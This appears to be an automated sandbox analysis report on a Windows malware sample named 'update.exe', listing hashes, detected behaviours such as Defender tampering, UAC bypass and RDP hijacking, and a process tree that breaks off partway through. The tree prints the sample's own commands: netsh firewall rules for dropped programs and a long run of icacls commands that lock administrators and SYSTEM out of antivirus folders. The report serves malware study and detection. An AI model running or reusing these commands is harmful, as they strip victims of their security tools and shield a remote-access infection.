Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    30-01-2025 08:28

General

  • Target

    update.exe

  • Size

    60.2MB

  • MD5

    b77955061c0f46de8059c20128ebb156

  • SHA1

    bd9ba700caec09387bfcf97bd9cc0a2e846836ca

  • SHA256

    ca94c8bbbb10febb8187f8c709affaa91911f646cf0ac99e857bf45b3a709091

  • SHA512

    83f07b66be1138e5f3f1c1f2504d3222bcc1bb1c1626a98e2346408cde7c771a64a998fa38c23ac66097f0b610f70c6309ea914e0c9c95ecff588a385aeb69aa

  • SSDEEP

    1572864:DdjkMwgaV4gRNzu1zCcFA4o/UDDvX94UKfytNxZhDa:FJGuMzuHnXDKfeN5Da

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • Rms family
  • UAC bypass 3 TTPs 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 3 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

  • Blocks application from running via registry modification 27 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Modifies Windows Firewall 2 TTPs 8 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 20 IoCs
  • Loads dropped DLL 50 IoCs
  • Modifies file permissions 1 TTPs 64 IoCs
  • Themida packer 41 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 4 IoCs
  • AutoIT Executable 35 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 6 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 34 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Time Discovery 1 TTPs 2 IoCs

    Adversary may gather the system time and/or time zone settings from a local or remote system.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies data under HKEY_USERS 43 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\update.exe
    "C:\Users\Admin\AppData\Local\Temp\update.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • UAC bypass
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Blocks application from running via registry modification
    • Drops file in Drivers directory
    • Checks BIOS information in registry
    • Adds Run key to start application
    • Checks whether UAC is enabled
    • Modifies WinLogon
    • Hide Artifacts: Hidden Users
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies system certificate store
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2052
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c sc delete swprv
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\system32\sc.exe
        sc delete swprv
        3⤵
        • Launches sc.exe
        PID:2140
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2672
      • C:\Windows\system32\netsh.exe
        netsh advfirewall set allprofiles state on
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:2680
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2660
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="AppModule" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:2836
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2784
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="AMD" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:2828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2932
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:2796
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:2608
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:3032
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:896
      • C:\Windows\system32\netsh.exe
        netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
        3⤵
        • Modifies Windows Firewall
        • Event Triggered Execution: Netsh Helper DLL
        PID:1464
    • C:\ProgramData\Setup\Game.exe
      C:\ProgramData\Setup\Game.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\ProgramData\RealtekHD\GameGuard.exe
        "C:\ProgramData\RealtekHD\GameGuard.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:1860
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
          4⤵
            PID:2896
            • C:\Windows\system32\icacls.exe
              icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)
              5⤵
              • Modifies file permissions
              PID:1204
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            4⤵
              PID:584
              • C:\Windows\system32\icacls.exe
                icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                5⤵
                • Modifies file permissions
                PID:1344
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
              4⤵
                PID:3060
                • C:\Windows\system32\icacls.exe
                  icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)
                  5⤵
                  • Modifies file permissions
                  PID:2260
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                4⤵
                  PID:2380
                  • C:\Windows\system32\icacls.exe
                    icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                    5⤵
                    • Modifies file permissions
                    PID:1628
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
                  4⤵
                    PID:1632
                    • C:\Windows\system32\icacls.exe
                      icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)
                      5⤵
                        PID:2968
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                      4⤵
                        PID:2728
                        • C:\Windows\system32\icacls.exe
                          icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                          5⤵
                          • Modifies file permissions
                          PID:2796
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
                        4⤵
                          PID:2536
                          • C:\Windows\system32\icacls.exe
                            icacls c:\programdata\Malwarebytes /deny Администраторы:(F)
                            5⤵
                            • Modifies file permissions
                            PID:2648
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                          4⤵
                            PID:2692
                            • C:\Windows\system32\icacls.exe
                              icacls c:\programdata\Malwarebytes /deny System:(F)
                              5⤵
                              • Modifies file permissions
                              PID:2672
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)
                            4⤵
                              PID:2808
                              • C:\Windows\system32\icacls.exe
                                icacls C:\Programdata\MB3Install /deny Администраторы:(F)
                                5⤵
                                • Modifies file permissions
                                PID:2404
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                              4⤵
                                PID:1728
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Programdata\MB3Install /deny System:(F)
                                  5⤵
                                  • Modifies file permissions
                                  PID:1936
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
                                4⤵
                                  PID:2036
                                  • C:\Windows\system32\icacls.exe
                                    icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)
                                    5⤵
                                      PID:1676
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                    4⤵
                                      PID:1104
                                      • C:\Windows\system32\icacls.exe
                                        icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                        5⤵
                                        • Modifies file permissions
                                        PID:980
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
                                      4⤵
                                        PID:2768
                                        • C:\Windows\system32\icacls.exe
                                          icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)
                                          5⤵
                                          • Modifies file permissions
                                          PID:2024
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
                                        4⤵
                                          PID:348
                                          • C:\Windows\system32\icacls.exe
                                            icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)
                                            5⤵
                                            • Modifies file permissions
                                            PID:1204
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
                                          4⤵
                                            PID:2248
                                            • C:\Windows\system32\icacls.exe
                                              icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)
                                              5⤵
                                                PID:2428
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                              4⤵
                                                PID:2424
                                                • C:\Windows\system32\icacls.exe
                                                  icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                  5⤵
                                                  • Modifies file permissions
                                                  PID:840
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny Администраторы:(OI)(CI)(F)
                                                4⤵
                                                  PID:2920
                                                  • C:\Windows\system32\icacls.exe
                                                    icacls C:\KVRT2020_Data /deny Администраторы:(OI)(CI)(F)
                                                    5⤵
                                                    • Modifies file permissions
                                                    PID:2724
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
                                                  4⤵
                                                    PID:2156
                                                    • C:\Windows\system32\icacls.exe
                                                      icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
                                                      5⤵
                                                      • Modifies file permissions
                                                      PID:1612
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny Администраторы:(OI)(CI)(F)
                                                    4⤵
                                                      PID:2176
                                                      • C:\Windows\system32\icacls.exe
                                                        icacls C:\FRST /deny Администраторы:(OI)(CI)(F)
                                                        5⤵
                                                        • Modifies file permissions
                                                        PID:1072
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
                                                      4⤵
                                                        PID:2968
                                                        • C:\Windows\system32\icacls.exe
                                                          icacls C:\FRST /deny system:(OI)(CI)(F)
                                                          5⤵
                                                          • Modifies file permissions
                                                          PID:2736
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
                                                        4⤵
                                                          PID:2520
                                                          • C:\Windows\system32\icacls.exe
                                                            icacls "C:\Program Files (x86)\360" /deny Администраторы:(OI)(CI)(F)
                                                            5⤵
                                                              PID:2564
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
                                                            4⤵
                                                              PID:2576
                                                              • C:\Windows\system32\icacls.exe
                                                                icacls "C:\ProgramData\360safe" /deny Администраторы:(OI)(CI)(F)
                                                                5⤵
                                                                • Modifies file permissions
                                                                PID:1468
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                              4⤵
                                                                PID:2008
                                                                • C:\Windows\system32\icacls.exe
                                                                  icacls "C:\Program Files (x86)\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                  5⤵
                                                                  • Modifies file permissions
                                                                  PID:2100
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
                                                                4⤵
                                                                  PID:1084
                                                                  • C:\Windows\system32\icacls.exe
                                                                    icacls "C:\Program Files\Malwarebytes" /deny Администраторы:(OI)(CI)(F)
                                                                    5⤵
                                                                    • Modifies file permissions
                                                                    PID:2160
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
                                                                  4⤵
                                                                    PID:1280
                                                                    • C:\Windows\system32\icacls.exe
                                                                      icacls "C:\Program Files\COMODO" /deny Администраторы:(OI)(CI)(F)
                                                                      5⤵
                                                                      • Modifies file permissions
                                                                      PID:676
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
                                                                    4⤵
                                                                      PID:2308
                                                                      • C:\Windows\system32\icacls.exe
                                                                        icacls "C:\Program Files\Enigma Software Group" /deny Администраторы:(OI)(CI)(F)
                                                                        5⤵
                                                                        • Modifies file permissions
                                                                        PID:1684
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                      4⤵
                                                                        PID:1828
                                                                        • C:\Windows\system32\icacls.exe
                                                                          icacls "C:\Program Files\SpyHunter" /deny Администраторы:(OI)(CI)(F)
                                                                          5⤵
                                                                          • Modifies file permissions
                                                                          PID:1196
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                        4⤵
                                                                          PID:2288
                                                                          • C:\Windows\system32\icacls.exe
                                                                            icacls "C:\Program Files\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                            5⤵
                                                                            • Modifies file permissions
                                                                            PID:876
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                          4⤵
                                                                            PID:1904
                                                                            • C:\Windows\system32\icacls.exe
                                                                              icacls "C:\Program Files (x86)\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                              5⤵
                                                                                PID:2668
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                              4⤵
                                                                                PID:1408
                                                                                • C:\Windows\system32\icacls.exe
                                                                                  icacls "C:\Programdata\AVAST Software" /deny Администраторы:(OI)(CI)(F)
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:1548
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                4⤵
                                                                                  PID:1912
                                                                                  • C:\Windows\system32\icacls.exe
                                                                                    icacls "C:\Program Files\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                    5⤵
                                                                                      PID:2012
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                    4⤵
                                                                                      PID:2004
                                                                                      • C:\Windows\system32\icacls.exe
                                                                                        icacls "C:\Program Files (x86)\AVG" /deny Администраторы:(OI)(CI)(F)
                                                                                        5⤵
                                                                                        • Modifies file permissions
                                                                                        PID:2848
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
                                                                                      4⤵
                                                                                        PID:3020
                                                                                        • C:\Windows\system32\icacls.exe
                                                                                          icacls "C:\ProgramData\Norton" /deny Администраторы:(OI)(CI)(F)
                                                                                          5⤵
                                                                                            PID:1524
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
                                                                                          4⤵
                                                                                            PID:1576
                                                                                            • C:\Windows\system32\icacls.exe
                                                                                              icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
                                                                                              5⤵
                                                                                              • Modifies file permissions
                                                                                              PID:2252
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                            4⤵
                                                                                              PID:1272
                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                5⤵
                                                                                                • Modifies file permissions
                                                                                                PID:1632
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                              4⤵
                                                                                                PID:2544
                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                  icacls "C:\Programdata\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                  5⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:2960
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                4⤵
                                                                                                  PID:764
                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                    5⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:2164
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
                                                                                                  4⤵
                                                                                                    PID:1304
                                                                                                    • C:\Windows\system32\icacls.exe
                                                                                                      icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Администраторы:(OI)(CI)(F)
                                                                                                      5⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:1344
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                    4⤵
                                                                                                      PID:948
                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                        icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                        5⤵
                                                                                                          PID:2144
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                          PID:1308
                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                            icacls "C:\Program Files\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                            5⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:1488
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:676
                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                              icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                              5⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:1036
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                              PID:1680
                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Администраторы:(OI)(CI)(F)
                                                                                                                5⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:2700
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:1528
                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                  icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                  5⤵
                                                                                                                  • Modifies file permissions
                                                                                                                  PID:2176
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny Администраторы:(OI)(CI)(F)
                                                                                                                4⤵
                                                                                                                  PID:1684
                                                                                                                  • C:\Windows\system32\icacls.exe
                                                                                                                    icacls "C:\Program Files\Bitdefender Agent" /deny Администраторы:(OI)(CI)(F)
                                                                                                                    5⤵
                                                                                                                      PID:1296
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                      PID:2112
                                                                                                                      • C:\Windows\system32\icacls.exe
                                                                                                                        icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)
                                                                                                                        5⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:2236
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny Администраторы:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                        PID:1636
                                                                                                                        • C:\Windows\system32\icacls.exe
                                                                                                                          icacls "C:\Program Files\DrWeb" /deny Администраторы:(OI)(CI)(F)
                                                                                                                          5⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:2920
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
                                                                                                                        4⤵
                                                                                                                          PID:2248
                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                            icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)
                                                                                                                            5⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:1500
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny Администраторы:(OI)(CI)(F)
                                                                                                                          4⤵
                                                                                                                            PID:1660
                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                              icacls "C:\Program Files\Common Files\Doctor Web" /deny Администраторы:(OI)(CI)(F)
                                                                                                                              5⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:2336
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
                                                                                                                            4⤵
                                                                                                                              PID:2536
                                                                                                                              • C:\Windows\system32\icacls.exe
                                                                                                                                icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)
                                                                                                                                5⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:2104
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny Администраторы:(OI)(CI)(F)
                                                                                                                              4⤵
                                                                                                                                PID:268
                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                  icacls "C:\Program Files\Common Files\AV" /deny Администраторы:(OI)(CI)(F)
                                                                                                                                  5⤵
                                                                                                                                  • Modifies file permissions
                                                                                                                                  PID:1196
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)
                                                                                                                                4⤵
